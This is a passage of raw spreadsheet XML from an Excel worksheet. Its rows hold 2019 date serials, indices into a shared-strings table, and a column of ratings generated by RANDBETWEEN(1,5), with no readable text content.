      <c r="F228">
        <f t="shared" ca="1" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="229" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A229" s="1">
        <v>43556.365104166667</v>
      </c>
      <c r="B229" t="s">
        <v>5</v>
      </c>
      <c r="C229" t="s">
        <v>41</v>
      </c>
      <c r="E229" t="s">
        <v>299</v>
      </c>
      <c r="F229">
        <f t="shared" ca="1" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="230" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A230" s="1">
        <v>43556.352384259262</v>
      </c>
      <c r="B230" t="s">
        <v>5</v>
      </c>
      <c r="C230" t="s">
        <v>10</v>
      </c>
      <c r="D230" t="s">
        <v>17</v>
      </c>
      <c r="E230" t="s">
        <v>300</v>
      </c>
      <c r="F230">
        <f t="shared" ca="1" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="231" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A231" s="1">
        <v>43556.348680555559</v>
      </c>
      <c r="B231" t="s">
        <v>5</v>
      </c>
      <c r="C231" t="s">
        <v>301</v>
      </c>
      <c r="E231" s="2" t="s">
        <v>302</v>
      </c>
      <c r="F231">
        <f t="shared" ca="1" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="232" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A232" s="1">
        <v>43556.340462962966</v>
      </c>
      <c r="B232" t="s">
        <v>5</v>
      </c>
      <c r="C232" t="s">
        <v>6</v>
      </c>
      <c r="D232" t="s">
        <v>194</v>
      </c>
      <c r="E232" t="s">
        <v>303</v>
      </c>
      <c r="F232">
        <f t="shared" ca="1" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="233" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A233" s="1">
        <v>43556.339398148149</v>
      </c>
      <c r="B233" t="s">
        <v>5</v>
      </c>
      <c r="C233" t="s">
        <v>6</v>
      </c>
      <c r="D233" t="s">
        <v>194</v>
      </c>
      <c r="E233" t="s">
        <v>303</v>
      </c>
      <c r="F233">
        <f t="shared" ca="1" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="234" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A234" s="1">
        <v>43556.331469907411</v>
      </c>
      <c r="B234" t="s">
        <v>13</v>
      </c>
      <c r="C234" t="s">
        <v>10</v>
      </c>
      <c r="D234" t="s">
        <v>112</v>
      </c>
      <c r="E234" s="2" t="s">
        <v>304</v>
      </c>
      <c r="F234">
        <f t="shared" ca="1" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="235" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A235" s="1">
        <v>43556.327291666668</v>
      </c>
      <c r="B235" t="s">
        <v>5</v>
      </c>
      <c r="C235" t="s">
        <v>71</v>
      </c>
      <c r="E235" s="2" t="s">
        <v>27454</v>
      </c>
      <c r="F235">
        <f t="shared" ca="1" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="236" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A236" s="1">
        <v>43556.322685185187</v>
      </c>
      <c r="B236" t="s">
        <v>5</v>
      </c>
      <c r="C236" t="s">
        <v>71</v>
      </c>
      <c r="E236" s="2" t="s">
        <v>305</v>
      </c>
      <c r="F236">
        <f t="shared" ca="1" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="237" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A237" s="1">
        <v>43556.321516203701</v>
      </c>
      <c r="B237" t="s">
        <v>19</v>
      </c>
      <c r="C237" t="s">
        <v>173</v>
      </c>
      <c r="E237" s="2" t="s">
        <v>306</v>
      </c>
      <c r="F237">
        <f t="shared" ca="1" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="238" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A238" s="1">
        <v>43556.317245370374</v>
      </c>
      <c r="B238" t="s">
        <v>5</v>
      </c>
      <c r="C238" t="s">
        <v>6</v>
      </c>
      <c r="D238" t="s">
        <v>7</v>
      </c>
      <c r="E238" s="2" t="s">
        <v>307</v>
      </c>
      <c r="F238">
        <f t="shared" ca="1" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="239" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A239" s="1">
        <v>43556.310682870368</v>
      </c>
      <c r="B239" t="s">
        <v>19</v>
      </c>
      <c r="C239" t="s">
        <v>10</v>
      </c>
      <c r="D239" t="s">
        <v>56</v>
      </c>
      <c r="E239" s="2" t="s">
        <v>308</v>
      </c>
      <c r="F239">
        <f t="shared" ca="1" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="240" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A240" s="1">
        <v>43556.291770833333</v>
      </c>
      <c r="B240" t="s">
        <v>5</v>
      </c>
      <c r="C240" t="s">
        <v>71</v>
      </c>
      <c r="E240" s="2" t="s">
        <v>309</v>
      </c>
      <c r="F240">
        <f t="shared" ca="1" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="241" spans="1:6" ht="330" x14ac:dyDescent="0.25">
      <c r="A241" s="1">
        <v>43556.287280092591</v>
      </c>
      <c r="B241" t="s">
        <v>19</v>
      </c>
      <c r="C241" t="s">
        <v>71</v>
      </c>
      <c r="E241" s="2" t="s">
        <v>310</v>
      </c>
      <c r="F241">
        <f t="shared" ca="1" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="242" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A242" s="1">
        <v>43556.284907407404</v>
      </c>
      <c r="B242" t="s">
        <v>9</v>
      </c>
      <c r="C242" t="s">
        <v>41</v>
      </c>
      <c r="E242" s="2" t="s">
        <v>311</v>
      </c>
      <c r="F242">
        <f t="shared" ca="1" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="243" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A243" s="1">
        <v>43556.271527777775</v>
      </c>
      <c r="B243" t="s">
        <v>35</v>
      </c>
      <c r="C243" t="s">
        <v>103</v>
      </c>
      <c r="D243" t="s">
        <v>312</v>
      </c>
      <c r="E243" s="2" t="s">
        <v>313</v>
      </c>
      <c r="F243">
        <f t="shared" ca="1" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="244" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A244" s="1">
        <v>43556.268842592595</v>
      </c>
      <c r="B244" t="s">
        <v>13</v>
      </c>
      <c r="C244" t="s">
        <v>314</v>
      </c>
      <c r="E244" t="s">
        <v>315</v>
      </c>
      <c r="F244">
        <f t="shared" ca="1" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="245" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A245" s="1">
        <v>43556.251226851855</v>
      </c>
      <c r="B245" t="s">
        <v>5</v>
      </c>
      <c r="C245" t="s">
        <v>48</v>
      </c>
      <c r="E245" t="s">
        <v>316</v>
      </c>
      <c r="F245">
        <f t="shared" ca="1" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="246" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A246" s="1">
        <v>43556.250740740739</v>
      </c>
      <c r="B246" t="s">
        <v>19</v>
      </c>
      <c r="C246" t="s">
        <v>118</v>
      </c>
      <c r="E246" t="s">
        <v>317</v>
      </c>
      <c r="F246">
        <f t="shared" ca="1" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="247" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A247" s="1">
        <v>43556.245069444441</v>
      </c>
      <c r="B247" t="s">
        <v>5</v>
      </c>
      <c r="C247" t="s">
        <v>319</v>
      </c>
      <c r="D247" t="s">
        <v>320</v>
      </c>
      <c r="E247" s="2" t="s">
        <v>321</v>
      </c>
      <c r="F247">
        <f t="shared" ca="1" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="248" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A248" s="1">
        <v>43556.236331018517</v>
      </c>
      <c r="B248" t="s">
        <v>13</v>
      </c>
      <c r="C248" t="s">
        <v>41</v>
      </c>
      <c r="E248" t="s">
        <v>322</v>
      </c>
      <c r="F248">
        <f t="shared" ca="1" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="249" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A249" s="1">
        <v>43556.175532407404</v>
      </c>
      <c r="B249" t="s">
        <v>5</v>
      </c>
      <c r="C249" t="s">
        <v>253</v>
      </c>
      <c r="E249" s="2" t="s">
        <v>323</v>
      </c>
      <c r="F249">
        <f t="shared" ca="1" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="250" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A250" s="1">
        <v>43556.158321759256</v>
      </c>
      <c r="B250" t="s">
        <v>9</v>
      </c>
      <c r="C250" t="s">
        <v>41</v>
      </c>
      <c r="E250" s="2" t="s">
        <v>324</v>
      </c>
      <c r="F250">
        <f t="shared" ca="1" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="251" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A251" s="1">
        <v>43556.130428240744</v>
      </c>
      <c r="B251" t="s">
        <v>9</v>
      </c>
      <c r="C251" t="s">
        <v>73</v>
      </c>
      <c r="E251" t="s">
        <v>325</v>
      </c>
      <c r="F251">
        <f t="shared" ca="1" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="252" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A252" s="1">
        <v>43556.124710648146</v>
      </c>
      <c r="B252" t="s">
        <v>5</v>
      </c>
      <c r="C252" t="s">
        <v>229</v>
      </c>
      <c r="E252" t="s">
        <v>326</v>
      </c>
      <c r="F252">
        <f t="shared" ca="1" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="253" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A253" s="1">
        <v>43556.11954861111</v>
      </c>
      <c r="B253" t="s">
        <v>19</v>
      </c>
      <c r="C253" t="s">
        <v>229</v>
      </c>
      <c r="E253" t="s">
        <v>327</v>
      </c>
      <c r="F253">
        <f t="shared" ca="1" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="254" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A254" s="1">
        <v>43556.098726851851</v>
      </c>
      <c r="B254" t="s">
        <v>13</v>
      </c>
      <c r="C254" t="s">
        <v>328</v>
      </c>
      <c r="E254" s="2" t="s">
        <v>329</v>
      </c>
      <c r="F254">
        <f t="shared" ca="1" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="255" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A255" s="1">
        <v>43556.060520833336</v>
      </c>
      <c r="B255" t="s">
        <v>22</v>
      </c>
      <c r="C255" t="s">
        <v>86</v>
      </c>
      <c r="D255" t="s">
        <v>330</v>
      </c>
      <c r="E255" s="2" t="s">
        <v>331</v>
      </c>
      <c r="F255">
        <f t="shared" ca="1" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="256" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A256" s="1">
        <v>43556.029432870368</v>
      </c>
      <c r="B256" t="s">
        <v>22</v>
      </c>
      <c r="C256" t="s">
        <v>140</v>
      </c>
      <c r="D256" t="s">
        <v>141</v>
      </c>
      <c r="E256" s="2" t="s">
        <v>332</v>
      </c>
      <c r="F256">
        <f t="shared" ca="1" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="257" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A257" s="1">
        <v>43556.024537037039</v>
      </c>
      <c r="B257" t="s">
        <v>5</v>
      </c>
      <c r="C257" t="s">
        <v>333</v>
      </c>
      <c r="E257" s="2" t="s">
        <v>334</v>
      </c>
      <c r="F257">
        <f t="shared" ca="1" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="258" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A258" s="1">
        <v>43555.950729166667</v>
      </c>
      <c r="B258" t="s">
        <v>19</v>
      </c>
      <c r="C258" t="s">
        <v>335</v>
      </c>
      <c r="D258" t="s">
        <v>336</v>
      </c>
      <c r="E258" s="2" t="s">
        <v>337</v>
      </c>
      <c r="F258">
        <f t="shared" ref="F258:F321" ca="1" si="4">RANDBETWEEN(1,5)</f>
        <v>2</v>
      </c>
    </row>
    <row r="259" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A259" s="1">
        <v>43555.678506944445</v>
      </c>
      <c r="B259" t="s">
        <v>19</v>
      </c>
      <c r="C259" t="s">
        <v>253</v>
      </c>
      <c r="E259" t="s">
        <v>338</v>
      </c>
      <c r="F259">
        <f t="shared" ca="1" si="4"/>
        <v>4</v>
      </c>
    </row>
    <row r="260" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A260" s="1">
        <v>43555.488159722219</v>
      </c>
      <c r="B260" t="s">
        <v>5</v>
      </c>
      <c r="C260" t="s">
        <v>339</v>
      </c>
      <c r="E260" t="s">
        <v>340</v>
      </c>
      <c r="F260">
        <f t="shared" ca="1" si="4"/>
        <v>2</v>
      </c>
    </row>
    <row r="261" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A261" s="1">
        <v>43555.434942129628</v>
      </c>
      <c r="B261" t="s">
        <v>19</v>
      </c>
      <c r="C261" t="s">
        <v>10</v>
      </c>
      <c r="D261" t="s">
        <v>263</v>
      </c>
      <c r="E261" t="s">
        <v>341</v>
      </c>
      <c r="F261">
        <f t="shared" ca="1" si="4"/>
        <v>3</v>
      </c>
    </row>
    <row r="262" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A262" s="1">
        <v>43555.412754629629</v>
      </c>
      <c r="B262" t="s">
        <v>19</v>
      </c>
      <c r="C262" t="s">
        <v>17</v>
      </c>
      <c r="E262" s="2" t="s">
        <v>342</v>
      </c>
      <c r="F262">
        <f t="shared" ca="1" si="4"/>
        <v>5</v>
      </c>
    </row>
    <row r="263" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A263" s="1">
        <v>43555.177384259259</v>
      </c>
      <c r="B263" t="s">
        <v>5</v>
      </c>
      <c r="C263" t="s">
        <v>344</v>
      </c>
      <c r="E263" s="2" t="s">
        <v>345</v>
      </c>
      <c r="F263">
        <f t="shared" ca="1" si="4"/>
        <v>3</v>
      </c>
    </row>
    <row r="264" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A264" s="1">
        <v>43554.931898148148</v>
      </c>
      <c r="B264" t="s">
        <v>5</v>
      </c>
      <c r="C264" t="s">
        <v>73</v>
      </c>
      <c r="E264" s="2" t="s">
        <v>346</v>
      </c>
      <c r="F264">
        <f t="shared" ca="1" si="4"/>
        <v>4</v>
      </c>
    </row>
    <row r="265" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A265" s="1">
        <v>43554.843217592592</v>
      </c>
      <c r="B265" t="s">
        <v>19</v>
      </c>
      <c r="C265" t="s">
        <v>10</v>
      </c>
      <c r="D265" t="s">
        <v>222</v>
      </c>
      <c r="E265" t="s">
        <v>347</v>
      </c>
      <c r="F265">
        <f t="shared" ca="1" si="4"/>
        <v>4</v>
      </c>
    </row>
    <row r="266" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A266" s="1">
        <v>43554.784594907411</v>
      </c>
      <c r="B266" t="s">
        <v>35</v>
      </c>
      <c r="C266" t="s">
        <v>173</v>
      </c>
      <c r="F266">
        <f t="shared" ca="1" si="4"/>
        <v>3</v>
      </c>
    </row>
    <row r="267" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A267" s="1">
        <v>43554.779930555553</v>
      </c>
      <c r="B267" t="s">
        <v>35</v>
      </c>
      <c r="C267" t="s">
        <v>29</v>
      </c>
      <c r="F267">
        <f t="shared" ca="1" si="4"/>
        <v>5</v>
      </c>
    </row>
    <row r="268" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A268" s="1">
        <v>43554.630011574074</v>
      </c>
      <c r="B268" t="s">
        <v>5</v>
      </c>
      <c r="C268" t="s">
        <v>60</v>
      </c>
      <c r="E268" t="s">
        <v>348</v>
      </c>
      <c r="F268">
        <f t="shared" ca="1" si="4"/>
        <v>5</v>
      </c>
    </row>
    <row r="269" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A269" s="1">
        <v>43554.499027777776</v>
      </c>
      <c r="B269" t="s">
        <v>13</v>
      </c>
      <c r="C269" t="s">
        <v>10</v>
      </c>
      <c r="D269" t="s">
        <v>6</v>
      </c>
      <c r="E269" t="s">
        <v>350</v>
      </c>
      <c r="F269">
        <f t="shared" ca="1" si="4"/>
        <v>3</v>
      </c>
    </row>
    <row r="270" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A270" s="1">
        <v>43554.34752314815</v>
      </c>
      <c r="B270" t="s">
        <v>19</v>
      </c>
      <c r="C270" t="s">
        <v>10</v>
      </c>
      <c r="D270" t="s">
        <v>178</v>
      </c>
      <c r="E270" t="s">
        <v>351</v>
      </c>
      <c r="F270">
        <f t="shared" ca="1" si="4"/>
        <v>5</v>
      </c>
    </row>
    <row r="271" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A271" s="1">
        <v>43554.110335648147</v>
      </c>
      <c r="B271" t="s">
        <v>5</v>
      </c>
      <c r="C271" t="s">
        <v>352</v>
      </c>
      <c r="F271">
        <f t="shared" ca="1" si="4"/>
        <v>1</v>
      </c>
    </row>
    <row r="272" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A272" s="1">
        <v>43554.097881944443</v>
      </c>
      <c r="B272" t="s">
        <v>5</v>
      </c>
      <c r="C272" t="s">
        <v>48</v>
      </c>
      <c r="E272" t="s">
        <v>353</v>
      </c>
      <c r="F272">
        <f t="shared" ca="1" si="4"/>
        <v>4</v>
      </c>
    </row>
    <row r="273" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A273" s="1">
        <v>43554.084340277775</v>
      </c>
      <c r="B273" t="s">
        <v>22</v>
      </c>
      <c r="C273" t="s">
        <v>92</v>
      </c>
      <c r="E273">
        <v>111111111111</v>
      </c>
      <c r="F273">
        <f t="shared" ca="1" si="4"/>
        <v>2</v>
      </c>
    </row>
    <row r="274" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A274" s="1">
        <v>43553.942395833335</v>
      </c>
      <c r="B274" t="s">
        <v>5</v>
      </c>
      <c r="C274" t="s">
        <v>140</v>
      </c>
      <c r="D274" t="s">
        <v>234</v>
      </c>
      <c r="E274" s="2" t="s">
        <v>354</v>
      </c>
      <c r="F274">
        <f t="shared" ca="1" si="4"/>
        <v>1</v>
      </c>
    </row>
    <row r="275" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A275" s="1">
        <v>43553.941979166666</v>
      </c>
      <c r="B275" t="s">
        <v>22</v>
      </c>
      <c r="C275" t="s">
        <v>140</v>
      </c>
      <c r="D275" t="s">
        <v>234</v>
      </c>
      <c r="E275" s="2" t="s">
        <v>354</v>
      </c>
      <c r="F275">
        <f t="shared" ca="1" si="4"/>
        <v>5</v>
      </c>
    </row>
    <row r="276" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A276" s="1">
        <v>43553.763356481482</v>
      </c>
      <c r="B276" t="s">
        <v>22</v>
      </c>
      <c r="C276" t="s">
        <v>10</v>
      </c>
      <c r="E276" s="2" t="s">
        <v>356</v>
      </c>
      <c r="F276">
        <f t="shared" ca="1" si="4"/>
        <v>2</v>
      </c>
    </row>
    <row r="277" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A277" s="1">
        <v>43553.743078703701</v>
      </c>
      <c r="B277" t="s">
        <v>5</v>
      </c>
      <c r="C277" t="s">
        <v>10</v>
      </c>
      <c r="D277" t="s">
        <v>192</v>
      </c>
      <c r="E277" t="s">
        <v>357</v>
      </c>
      <c r="F277">
        <f t="shared" ca="1" si="4"/>
        <v>4</v>
      </c>
    </row>
    <row r="278" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A278" s="1">
        <v>43553.726215277777</v>
      </c>
      <c r="B278" t="s">
        <v>5</v>
      </c>
      <c r="C278" t="s">
        <v>10</v>
      </c>
      <c r="D278" t="s">
        <v>229</v>
      </c>
      <c r="E278" t="s">
        <v>358</v>
      </c>
      <c r="F278">
        <f t="shared" ca="1" si="4"/>
        <v>1</v>
      </c>
    </row>
    <row r="279" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A279" s="1">
        <v>43553.715497685182</v>
      </c>
      <c r="B279" t="s">
        <v>19</v>
      </c>
      <c r="C279" t="s">
        <v>10</v>
      </c>
      <c r="D279" t="s">
        <v>89</v>
      </c>
      <c r="E279" t="s">
        <v>359</v>
      </c>
      <c r="F279">
        <f t="shared" ca="1" si="4"/>
        <v>5</v>
      </c>
    </row>
    <row r="280" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A280" s="1">
        <v>43553.709143518521</v>
      </c>
      <c r="B280" t="s">
        <v>5</v>
      </c>
      <c r="C280" t="s">
        <v>10</v>
      </c>
      <c r="D280" t="s">
        <v>23</v>
      </c>
      <c r="E280" t="s">
        <v>360</v>
      </c>
      <c r="F280">
        <f t="shared" ca="1" si="4"/>
        <v>3</v>
      </c>
    </row>
    <row r="281" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A281" s="1">
        <v>43553.696921296294</v>
      </c>
      <c r="B281" t="s">
        <v>5</v>
      </c>
      <c r="C281" t="s">
        <v>10</v>
      </c>
      <c r="D281" t="s">
        <v>36</v>
      </c>
      <c r="E281" s="2" t="s">
        <v>361</v>
      </c>
      <c r="F281">
        <f t="shared" ca="1" si="4"/>
        <v>3</v>
      </c>
    </row>
    <row r="282" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A282" s="1">
        <v>43553.677835648145</v>
      </c>
      <c r="B282" t="s">
        <v>5</v>
      </c>
      <c r="C282" t="s">
        <v>10</v>
      </c>
      <c r="D282" t="s">
        <v>232</v>
      </c>
      <c r="E282" t="s">
        <v>362</v>
      </c>
      <c r="F282">
        <f t="shared" ca="1" si="4"/>
        <v>5</v>
      </c>
    </row>
    <row r="283" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A283" s="1">
        <v>43553.673842592594</v>
      </c>
      <c r="B283" t="s">
        <v>13</v>
      </c>
      <c r="C283" t="s">
        <v>10</v>
      </c>
      <c r="D283" t="s">
        <v>6</v>
      </c>
      <c r="E283" s="2" t="s">
        <v>363</v>
      </c>
      <c r="F283">
        <f t="shared" ca="1" si="4"/>
        <v>1</v>
      </c>
    </row>
    <row r="284" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A284" s="1">
        <v>43553.661458333336</v>
      </c>
      <c r="B284" t="s">
        <v>35</v>
      </c>
      <c r="C284" t="s">
        <v>10</v>
      </c>
      <c r="D284" t="s">
        <v>89</v>
      </c>
      <c r="E284" t="s">
        <v>364</v>
      </c>
      <c r="F284">
        <f t="shared" ca="1" si="4"/>
        <v>5</v>
      </c>
    </row>
    <row r="285" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A285" s="1">
        <v>43553.657858796294</v>
      </c>
      <c r="B285" t="s">
        <v>19</v>
      </c>
      <c r="C285" t="s">
        <v>10</v>
      </c>
      <c r="D285" t="s">
        <v>71</v>
      </c>
      <c r="E285" t="s">
        <v>365</v>
      </c>
      <c r="F285">
        <f t="shared" ca="1" si="4"/>
        <v>4</v>
      </c>
    </row>
    <row r="286" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A286" s="1">
        <v>43553.647152777776</v>
      </c>
      <c r="B286" t="s">
        <v>13</v>
      </c>
      <c r="C286" t="s">
        <v>10</v>
      </c>
      <c r="D286" t="s">
        <v>6</v>
      </c>
      <c r="E286" s="2" t="s">
        <v>366</v>
      </c>
      <c r="F286">
        <f t="shared" ca="1" si="4"/>
        <v>4</v>
      </c>
    </row>
    <row r="287" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A287" s="1">
        <v>43553.645289351851</v>
      </c>
      <c r="B287" t="s">
        <v>13</v>
      </c>
      <c r="C287" t="s">
        <v>10</v>
      </c>
      <c r="D287" t="s">
        <v>367</v>
      </c>
      <c r="E287" t="s">
        <v>368</v>
      </c>
      <c r="F287">
        <f t="shared" ca="1" si="4"/>
        <v>3</v>
      </c>
    </row>
    <row r="288" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A288" s="1">
        <v>43553.628148148149</v>
      </c>
      <c r="B288" t="s">
        <v>22</v>
      </c>
      <c r="C288" t="s">
        <v>10</v>
      </c>
      <c r="D288" t="s">
        <v>20</v>
      </c>
      <c r="E288" t="s">
        <v>369</v>
      </c>
      <c r="F288">
        <f t="shared" ca="1" si="4"/>
        <v>4</v>
      </c>
    </row>
    <row r="289" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A289" s="1">
        <v>43553.623703703706</v>
      </c>
      <c r="B289" t="s">
        <v>19</v>
      </c>
      <c r="C289" t="s">
        <v>10</v>
      </c>
      <c r="D289" t="s">
        <v>6</v>
      </c>
      <c r="E289" t="s">
        <v>370</v>
      </c>
      <c r="F289">
        <f t="shared" ca="1" si="4"/>
        <v>2</v>
      </c>
    </row>
    <row r="290" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A290" s="1">
        <v>43553.617766203701</v>
      </c>
      <c r="B290" t="s">
        <v>5</v>
      </c>
      <c r="C290" t="s">
        <v>10</v>
      </c>
      <c r="D290" t="s">
        <v>6</v>
      </c>
      <c r="E290" t="s">
        <v>371</v>
      </c>
      <c r="F290">
        <f t="shared" ca="1" si="4"/>
        <v>2</v>
      </c>
    </row>
    <row r="291" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A291" s="1">
        <v>43553.609907407408</v>
      </c>
      <c r="B291" t="s">
        <v>5</v>
      </c>
      <c r="C291" t="s">
        <v>10</v>
      </c>
      <c r="E291" t="s">
        <v>373</v>
      </c>
      <c r="F291">
        <f t="shared" ca="1" si="4"/>
        <v>3</v>
      </c>
    </row>
    <row r="292" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A292" s="1">
        <v>43553.588425925926</v>
      </c>
      <c r="B292" t="s">
        <v>5</v>
      </c>
      <c r="C292" t="s">
        <v>10</v>
      </c>
      <c r="D292" t="s">
        <v>374</v>
      </c>
      <c r="E292" t="s">
        <v>375</v>
      </c>
      <c r="F292">
        <f t="shared" ca="1" si="4"/>
        <v>1</v>
      </c>
    </row>
    <row r="293" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A293" s="1">
        <v>43553.582129629627</v>
      </c>
      <c r="B293" t="s">
        <v>5</v>
      </c>
      <c r="C293" t="s">
        <v>6</v>
      </c>
      <c r="D293" t="s">
        <v>194</v>
      </c>
      <c r="E293" s="2" t="s">
        <v>376</v>
      </c>
      <c r="F293">
        <f t="shared" ca="1" si="4"/>
        <v>5</v>
      </c>
    </row>
    <row r="294" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A294" s="1">
        <v>43553.550868055558</v>
      </c>
      <c r="B294" t="s">
        <v>13</v>
      </c>
      <c r="C294" t="s">
        <v>10</v>
      </c>
      <c r="D294" t="s">
        <v>290</v>
      </c>
      <c r="E294" s="2" t="s">
        <v>377</v>
      </c>
      <c r="F294">
        <f t="shared" ca="1" si="4"/>
        <v>1</v>
      </c>
    </row>
    <row r="295" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A295" s="1">
        <v>43553.54278935185</v>
      </c>
      <c r="B295" t="s">
        <v>13</v>
      </c>
      <c r="C295" t="s">
        <v>10</v>
      </c>
      <c r="D295" t="s">
        <v>17</v>
      </c>
      <c r="E295" s="2" t="s">
        <v>378</v>
      </c>
      <c r="F295">
        <f t="shared" ca="1" si="4"/>
        <v>1</v>
      </c>
    </row>
    <row r="296" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A296" s="1">
        <v>43553.51284722222</v>
      </c>
      <c r="B296" t="s">
        <v>9</v>
      </c>
      <c r="C296" t="s">
        <v>10</v>
      </c>
      <c r="D296" t="s">
        <v>6</v>
      </c>
      <c r="E296" s="2" t="s">
        <v>379</v>
      </c>
      <c r="F296">
        <f t="shared" ca="1" si="4"/>
        <v>3</v>
      </c>
    </row>
    <row r="297" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A297" s="1">
        <v>43553.51284722222</v>
      </c>
      <c r="B297" t="s">
        <v>9</v>
      </c>
      <c r="C297" t="s">
        <v>10</v>
      </c>
      <c r="D297" t="s">
        <v>6</v>
      </c>
      <c r="E297" s="2" t="s">
        <v>379</v>
      </c>
      <c r="F297">
        <f t="shared" ca="1" si="4"/>
        <v>4</v>
      </c>
    </row>
    <row r="298" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A298" s="1">
        <v>43553.491875</v>
      </c>
      <c r="B298" t="s">
        <v>9</v>
      </c>
      <c r="C298" t="s">
        <v>260</v>
      </c>
      <c r="E298" t="s">
        <v>380</v>
      </c>
      <c r="F298">
        <f t="shared" ca="1" si="4"/>
        <v>2</v>
      </c>
    </row>
    <row r="299" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A299" s="1">
        <v>43553.482418981483</v>
      </c>
      <c r="B299" t="s">
        <v>13</v>
      </c>
      <c r="C299" t="s">
        <v>10</v>
      </c>
      <c r="D299" t="s">
        <v>381</v>
      </c>
      <c r="E299" s="2" t="s">
        <v>382</v>
      </c>
      <c r="F299">
        <f t="shared" ca="1" si="4"/>
        <v>1</v>
      </c>
    </row>
    <row r="300" spans="1:6" ht="90" x14ac:dyDescent="0.25">
